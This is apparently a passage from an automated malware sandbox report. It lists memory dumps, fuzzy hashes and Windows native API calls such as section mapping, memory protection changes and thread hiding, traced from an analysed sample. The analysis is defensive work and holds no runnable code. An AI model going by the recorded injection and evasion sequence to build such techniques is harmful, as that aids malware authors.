                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'^q$4'^q$$^q$$^q
                                                  • API String ID: 0-2049395529

                                                  Execution Graph

                                                  Execution Coverage:31.1%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:36
                                                  Total number of Limit Nodes:0
                                                  execution_graph (rendered graph not extracted; each chain below is entry node → API call node → return node):
                                                  • 4bac3b8 → 4bac401 NtQuerySystemInformation → 4bac46e
                                                  • 4bac138 → 4bac187 NtOpenFile → 4bac20a
                                                  • 4bac788 → 4bac7d1 NtDeviceIoControlFile → 4bac880
                                                  • 4bab548 → 4bab58c NtSetInformationThread → 4bab5f9
                                                  • 4bd8b78 → 4bd8bc0 EnumWindows → 4bd8c25
                                                  • 4bab420 → 4bab469 NtQueryInformationProcess → 4bab4e1
                                                  • 4babc80 → 4babccc NtAllocateVirtualMemory → 4babd4f
                                                  • 4bac270 → 4bac2bf NtCreateSection → 4bac34d
                                                  • 4bab660 → 4bab6a4 NtClose → 4bab6f0
                                                  • 4bac660 → 4bac6a9 NtQueryVolumeInformationFile → 4bac721
                                                  • 4bac4d0 → 4bac51c NtMapViewOfSection → 4bac5df
                                                  • 4bab750 → 4bab79f NtProtectVirtualMemory → 4bab817

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph: basic blocks 46c0870 through 46c0932 (rendered graph not extracted)
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: a^q$4'^q$4'^q
                                                  • API String ID: 0-622892151

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph: basic blocks 46c0868 through 46c0932 (rendered graph not extracted)
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: a^q$4'^q
                                                  • API String ID: 0-3189636481
                                                  APIs
                                                  • NtMapViewOfSection.NTDLL(?,?,?,?,?), ref: 04BAC5CD
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: SectionView
                                                  • String ID:
                                                  • API String ID: 1323581903-0
                                                  APIs
                                                  • NtMapViewOfSection.NTDLL(?,?,?,?,?), ref: 04BAC5CD
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: SectionView
                                                  • String ID:
                                                  • API String ID: 1323581903-0
                                                  APIs
                                                  • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 04BAC33B
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: CreateSection
                                                  • String ID:
                                                  • API String ID: 2449625523-0
                                                  • Opcode ID: a886d4ec8a17ed03b60fe254650d9f94ab8070ff89038997c529c21b60a0d40f
                                                  • Instruction ID: 06b78c8350fe3f7f8e3ca4464d5097d458bd0e14c0c4e1db97cc2b912b3d48c2
                                                  • Opcode Fuzzy Hash: a886d4ec8a17ed03b60fe254650d9f94ab8070ff89038997c529c21b60a0d40f
                                                  • Instruction Fuzzy Hash: C14179B5D052589FCF10CFA9D584ADEFBF1BB49310F10A02AE918B7210D735A955CF98
                                                  APIs
                                                  • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 04BAC33B
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: CreateSection
                                                  • String ID:
                                                  • API String ID: 2449625523-0
                                                  • Opcode ID: f646937a54701fd09a89e3cb629955ac1cc1cb66175c731001192989225c835f
                                                  • Instruction ID: 4f2b6faa11702d532ebba73148925baf7b3e179a3eab02a442e553aee39dc3ff
                                                  • Opcode Fuzzy Hash: f646937a54701fd09a89e3cb629955ac1cc1cb66175c731001192989225c835f
                                                  • Instruction Fuzzy Hash: AF4178B5D052589FCF10CFA9D580ADEFBF1BB49310F20902AE818B7210D735A955CF98
                                                  APIs
                                                  • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 04BAC1F8
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: FileOpen
                                                  • String ID:
                                                  • API String ID: 2669468079-0
                                                  • Opcode ID: c9f02547ceda6a85a2f5966ce3b8466ca2bf22ba788a7eb528a14133e9e25aaa
                                                  • Instruction ID: 7bb330f6fd8e995d22b48702786786835612aa90be76435fd7224ebb7e1fa6b3
                                                  • Opcode Fuzzy Hash: c9f02547ceda6a85a2f5966ce3b8466ca2bf22ba788a7eb528a14133e9e25aaa
                                                  • Instruction Fuzzy Hash: 5A4187B9D042589FCF00CFA9D984ADEFBB1FB49310F10902AE819B7210D735A956CF94
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 04BABD3D
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: fe99cdc549d33630f4ee45704a04e60e41a0b28874ef81c514e46fd32dc07f8e
                                                  • Instruction ID: 25e7ae509352782355cca76174740569967f93c41e93fb65e16de913828f5012
                                                  • Opcode Fuzzy Hash: fe99cdc549d33630f4ee45704a04e60e41a0b28874ef81c514e46fd32dc07f8e
                                                  • Instruction Fuzzy Hash: 474187B5D042589FCF10CFA9D980AEEFBB1BB49310F20942AE918B7210D735A956CF58
                                                  APIs
                                                  • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 04BAC1F8
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: FileOpen
                                                  • String ID:
                                                  • API String ID: 2669468079-0
                                                  • Opcode ID: 14897517667a2f2487342eb46da4c35a048fcb779e3a80a46da4c357d90a9696
                                                  • Instruction ID: 824c74f18bffc7b33bd14998fedd7941fb8fef42026ac8ee5a97d03bc0dd669f
                                                  • Opcode Fuzzy Hash: 14897517667a2f2487342eb46da4c35a048fcb779e3a80a46da4c357d90a9696
                                                  • Instruction Fuzzy Hash: 634178B9D042589FCF10CFA9D984ADEFBB1FB49310F10902AE819B7210D735A955CF98
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 04BABD3D
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: 5628e74dc386d515d2de462124472e4f8c2062f798a9bce8c0546a7e135fee37
                                                  • Instruction ID: dd1aed15698e05512c84f18741ebafffaa176f3732762cdf7b65190d70b9985a
                                                  • Opcode Fuzzy Hash: 5628e74dc386d515d2de462124472e4f8c2062f798a9bce8c0546a7e135fee37
                                                  • Instruction Fuzzy Hash: 444188B9D042589FCF10CFA9D984ADEFBB1FB49310F10942AE918B7210D735A955CFA8
                                                  APIs
                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 04BAB4CF
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationProcessQuery
                                                  • String ID:
                                                  • API String ID: 1778838933-0
                                                  • Opcode ID: 6b3f7fc17e6c6fb77cb486409383043f393f02b2054882fc2a1b57389b20bd9e
                                                  • Instruction ID: 1453e0543585f49d4fe6f513322cc367ddbe84b795b323b80b865769ddcee9d5
                                                  • Opcode Fuzzy Hash: 6b3f7fc17e6c6fb77cb486409383043f393f02b2054882fc2a1b57389b20bd9e
                                                  • Instruction Fuzzy Hash: 9F41A7B5D042589FCF10CFA9D984ADEFBB1BB49310F10942AE915B7210D735A945CF64
                                                  APIs
                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 04BAB4CF
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationProcessQuery
                                                  • String ID:
                                                  • API String ID: 1778838933-0
                                                  • Opcode ID: 7196f98215ee69920f76fe35c01edd88539f10bd2b10d9abf0669e41ef37d38a
                                                  • Instruction ID: 3665244ba2b593fa3cc2cf8c4d21c5a4082d205cbac684c4218b94e86c581924
                                                  • Opcode Fuzzy Hash: 7196f98215ee69920f76fe35c01edd88539f10bd2b10d9abf0669e41ef37d38a
                                                  • Instruction Fuzzy Hash: 423197B9D042589FCF10CFA9D980ADEFBB1FB49310F10942AE915B7210D735A945CF68
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,?,?,?), ref: 04BAB5E7
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: 9f44510aa93588402da1028da02a91c5613f86234f6c806585804ebb267a53e0
                                                  • Instruction ID: ab2ab6f0ea451c6377551958ac49a710e0530a7cfcf57693583c34cfbce3ed3c
                                                  • Opcode Fuzzy Hash: 9f44510aa93588402da1028da02a91c5613f86234f6c806585804ebb267a53e0
                                                  • Instruction Fuzzy Hash: 0C31C7B4D042589FCF14CFA9E880AEEFBB0BF49310F24942AE815BB210D735A845CF58
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,?,?,?), ref: 04BAB5E7
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: 8bb35c84d18aaac231918ca7048200713aef2c2041e9cce75e6b5f39b6e09f9f
                                                  • Instruction ID: 9d78f46af4a8fc1efc9b20f05f207c3972471a80de26760807260177da9c2ca2
                                                  • Opcode Fuzzy Hash: 8bb35c84d18aaac231918ca7048200713aef2c2041e9cce75e6b5f39b6e09f9f
                                                  • Instruction Fuzzy Hash: 093198B5D042589FCF10CFA9E984ADEFBB1FB49310F24942AE815B7210D735A945CF98
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7246b213d97a4479036bc2c73b5b793e203e747e5bd11779ec8a5bba58b4fb51
                                                  • Instruction ID: 08cc507973dfaa3161c50d28d48c3171032bcf23f7bdbd666da610d3efd7c992
                                                  • Opcode Fuzzy Hash: 7246b213d97a4479036bc2c73b5b793e203e747e5bd11779ec8a5bba58b4fb51
                                                  • Instruction Fuzzy Hash: AA112774E49249DFCB45CFA8C5506ADBFB0EF0A300F1441EAD415E72A2E3349A45DF61
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ab7978232d56542263b718e9edc5f9442d5aeb380226c1fb4ee150fe005661b3
                                                  • Instruction ID: 2867b990f8c5df006a9fafb855564984cdf4199f82f681632d820a9654f3e30c
                                                  • Opcode Fuzzy Hash: ab7978232d56542263b718e9edc5f9442d5aeb380226c1fb4ee150fe005661b3
                                                  • Instruction Fuzzy Hash: DD115BB0D0D2898FCB52DFA884406FDBFB0AF07215F1541EAD050EB292E3785A41DF95
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1233bb34eaa93795d244f7f133018aba917d86ee7d3b517d539bc83ecbdb6d0f
                                                  • Instruction ID: a3ae5d36ad384c501b2dc071ec7a7caaab0ac2c328ac0efb2d6d8b0a9254cb14
                                                  • Opcode Fuzzy Hash: 1233bb34eaa93795d244f7f133018aba917d86ee7d3b517d539bc83ecbdb6d0f
                                                  • Instruction Fuzzy Hash: 15019278E44219DFCB44DFE8D544ABEBBB0FB09301F1055AAD415A7350E730AA41DFA5
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bee9ca747ec042a9ff6d42daee95661e7e3d7a5a2084030d55c6c5c12d225c6c
                                                  • Instruction ID: 3e5e339c751c38089ab989c724d78b71366b3a82ea62af0efc75bdd1435f4d65
                                                  • Opcode Fuzzy Hash: bee9ca747ec042a9ff6d42daee95661e7e3d7a5a2084030d55c6c5c12d225c6c
                                                  • Instruction Fuzzy Hash: D501CEB4E042199FCB44DFE8C540AFEBBB0BB0A301F1045A99814A7340E778AA80DFA5
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3f84ae7b6f8427378ea642061aa0aee0c82d62f779f90f92ffe550295f580e3
                                                  • Instruction ID: 46b9e3c709e40ea9f39ecf40ea0fb1f4d55ba7db75f1231517e301b657eedcd9
                                                  • Opcode Fuzzy Hash: a3f84ae7b6f8427378ea642061aa0aee0c82d62f779f90f92ffe550295f580e3
                                                  • Instruction Fuzzy Hash: 23F01CB4D0A348AFCB41DFB8A4545DCBFB0EB06304F0491EBC858E7292E6348A46CB46
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5d6c1c1f894c5fbb611ce06ecfe7abf1419c50097f3cf77c7d776456caf16f6a
                                                  • Instruction ID: b36130193937fbf2db6c36479334fc19a389b44b36144c52fea2b70d807951fc
                                                  • Opcode Fuzzy Hash: 5d6c1c1f894c5fbb611ce06ecfe7abf1419c50097f3cf77c7d776456caf16f6a
                                                  • Instruction Fuzzy Hash: E4E07574D05208EFCB54DFA8E4446ADFBF4AB45300F1095A99818B3350E7749A50DB45

                                                  Control-flow Graph (basic blocks 46c0a08-46c0aba; edge list omitted)
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q
                                                  • API String ID: 0-2125118731
                                                  • Opcode ID: 25e3945031d5f9a2c38bda598379d65281b0f996c4f06984dbf56baf6ac70845
                                                  • Instruction ID: 08b2698276464e192e1c57f68158811ebfaea9bb7f25da1340544b19969053ed
                                                  • Opcode Fuzzy Hash: 25e3945031d5f9a2c38bda598379d65281b0f996c4f06984dbf56baf6ac70845
                                                  • Instruction Fuzzy Hash: 6F21A074A0020CEFDB18DFE8D544AADBBF1FB54300F208599E405AB356E770AA85DB40

                                                  Control-flow Graph (basic blocks 46c09ed-46c0aba; edge list omitted)
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q
                                                  • API String ID: 0-355816377
                                                  • Opcode ID: 1eb10c147dc8ca8d78568195a68f8266adf3cf16dc4610d50383352fab4c726e
                                                  • Instruction ID: 6241691afc1cbc94f335788c7aca56ed6c7ffae164fe126ff858a218905384ce
                                                  • Opcode Fuzzy Hash: 1eb10c147dc8ca8d78568195a68f8266adf3cf16dc4610d50383352fab4c726e
                                                  • Instruction Fuzzy Hash: B511F370E09248EFCB1ADFE8D4446BCBBF0EB22300F1085EAD4059B292E7746A85DB41
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a948996ff03eb5d70a85a662b77c1ab49b4509310da77460fc97c90c05cd61cd
                                                  • Instruction ID: 0809c748703459b383175a8f872440dfcf2cfbd9437abbce5a96d9c125c5a536
                                                  • Opcode Fuzzy Hash: a948996ff03eb5d70a85a662b77c1ab49b4509310da77460fc97c90c05cd61cd
                                                  • Instruction Fuzzy Hash: 67016930909388DFC706CBA485546AD7FB0EB06300F1981DEC804CB2A2E7706E44DB52
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6bb8608d80e9cd4003509603aec8487a611602d6a925a65970fcc86f0c123dd4
                                                  • Instruction ID: 7fe3a1cd39e89ae24b54e1d09f344c0403e79723082652f8f0b9a114946c21a4
                                                  • Opcode Fuzzy Hash: 6bb8608d80e9cd4003509603aec8487a611602d6a925a65970fcc86f0c123dd4
                                                  • Instruction Fuzzy Hash: 18F0B734A00208EFCB58DFE8D544AADBBF5EB44701F2085A9D40597391EB70AE95DB51
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9eb40ffbe8f1665d7727975e7d05c9f33ea69481854884538f71da870fa29206
                                                  • Instruction ID: 2014136460c2048493212b76603dea3f7e49c7de2ae723811333b721ce1a1d79
                                                  • Opcode Fuzzy Hash: 9eb40ffbe8f1665d7727975e7d05c9f33ea69481854884538f71da870fa29206
                                                  • Instruction Fuzzy Hash: 95F08C6094E3C49FC703DBB4591529D7FB0AF03204B0A40DFC884DF2A3D6241E09D762
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2b59e358b5bac0d787f9fd6ed7932638d7c74c5ddd9fa7703d700730a0502128